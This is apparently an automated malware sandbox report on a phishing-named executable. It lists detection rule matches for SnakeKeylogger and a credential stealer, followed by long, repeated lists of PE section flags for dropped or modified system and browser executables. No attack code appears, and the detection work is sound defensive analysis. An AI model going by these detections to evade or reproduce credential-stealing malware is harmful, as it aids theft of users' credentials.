              Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7zFM.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.132_chrome_installer.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
